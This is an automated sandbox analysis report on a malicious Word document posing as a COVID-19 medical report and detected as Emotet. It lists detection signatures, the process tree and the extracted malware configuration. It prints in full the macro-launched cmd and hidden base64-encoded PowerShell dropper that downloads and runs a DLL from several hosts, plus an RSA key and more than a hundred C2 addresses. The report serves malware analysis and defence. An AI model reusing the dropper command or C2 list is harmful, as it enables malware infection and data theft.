Play interactive tour

Edit tour

Analysis Report IU-8549 Medical report COVID-19.doc

Overview

General Information

Sample Name:	IU-8549 Medical report COVID-19.doc
Analysis ID:	354471
MD5:	be33bce1030d367cf23727936fc1fbfd
SHA1:	2731bb3115108d14d2a4d5abd49aef32468961c9
SHA256:	843ac5a5070a8f77eeb150cf7963ea5a66dd5763b0e3ac3d775333219fa5b773
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

C2 URLs / IPs found in malware configuration

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Document contains an embedded VBA with many randomly named variables

Document contains an embedded VBA with many string operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Obfuscated command line found

Potential dropper URLs found in powershell memory

Powershell drops PE file

Sigma detected: Suspicious Call by Ordinal

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Connects to several IPs in different countries

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 1796 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 1084 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 592 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

powershell.exe (PID: 1320 cmdline: powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 2416 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2296 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2700 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2824 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2460 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["69.38.130.14:80", "195.159.28.230:8080", "162.241.204.233:8080", "115.21.224.117:80", "78.189.148.42:80", "181.165.68.127:80", "78.188.225.105:80", "161.0.153.60:80", "89.106.251.163:80", "172.125.40.123:80", "5.39.91.110:7080", "110.145.11.73:80", "190.251.200.206:80", "144.217.7.207:7080", "75.109.111.18:80", "75.177.207.146:80", "139.59.60.244:8080", "70.183.211.3:80", "95.213.236.64:8080", "61.19.246.238:443", "174.118.202.24:443", "71.72.196.159:80", "138.68.87.218:443", "24.164.79.147:8080", "49.205.182.134:80", "24.231.88.85:80", "121.124.124.40:7080", "95.9.5.93:80", "118.83.154.64:443", "78.24.219.147:8080", "104.131.11.150:443", "85.105.205.77:8080", "108.53.88.101:443", "187.161.206.24:80", "203.153.216.189:7080", "37.187.72.193:8080", "185.94.252.104:443", "157.245.99.39:8080", "50.91.114.38:80", "87.106.139.101:8080", "74.128.121.17:80", "62.75.141.82:80", "37.139.21.175:8080", "190.103.228.24:80", "134.209.144.106:443", "78.182.254.231:80", "186.74.215.34:80", "180.222.161.85:80", "69.49.88.46:80", "202.134.4.211:8080", "75.113.193.72:80", "139.162.60.124:8080", "79.137.83.50:443", "123.176.25.234:80", "172.105.13.66:443", "93.146.48.84:80", "109.116.245.80:80", "41.185.28.84:8080", "98.109.133.80:80", "194.190.67.75:80", "110.145.101.66:443", "136.244.110.184:8080", "24.179.13.119:80", "89.216.122.92:80", "139.99.158.11:443", "172.86.188.251:8080", "74.40.205.197:443", "62.171.142.179:8080", "167.114.153.111:8080", "119.59.116.21:8080", "74.58.215.226:80", "188.165.214.98:8080", "172.104.97.173:8080", "197.211.245.21:80", "66.57.108.14:443", "188.219.31.12:80", "168.235.67.138:7080", "24.69.65.8:8080", "173.70.61.180:80", "110.142.236.207:80", "51.89.36.180:443", "46.105.131.79:8080", "194.4.58.192:7080", "220.245.198.194:80", "109.74.5.95:8080", "24.178.90.49:80", "181.171.209.241:443", "59.21.235.119:80", "94.23.237.171:443", "12.175.220.98:80", "217.20.166.178:7080", "50.116.111.59:8080", "176.111.60.55:8080", "200.116.145.225:443", "120.150.60.189:80", "185.201.9.197:8080", "202.134.4.216:8080", "120.150.218.241:443", "2.58.16.89:8080", "70.92.118.112:80", "74.208.45.104:8080", "79.130.130.240:8080", "190.240.194.77:443", "85.105.111.166:80", "115.94.207.99:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.2121216068.0000000000290000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2110577655.0000000000230000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2145222435.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2334223344.0000000000160000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2121359913.0000000000700000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2122851678.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2145232978.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2155705121.00000000001D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2335867328.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2110590102.0000000000250000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2155718494.0000000000200000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2131220245.0000000000150000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2131240758.0000000000170000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2334238430.0000000000180000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
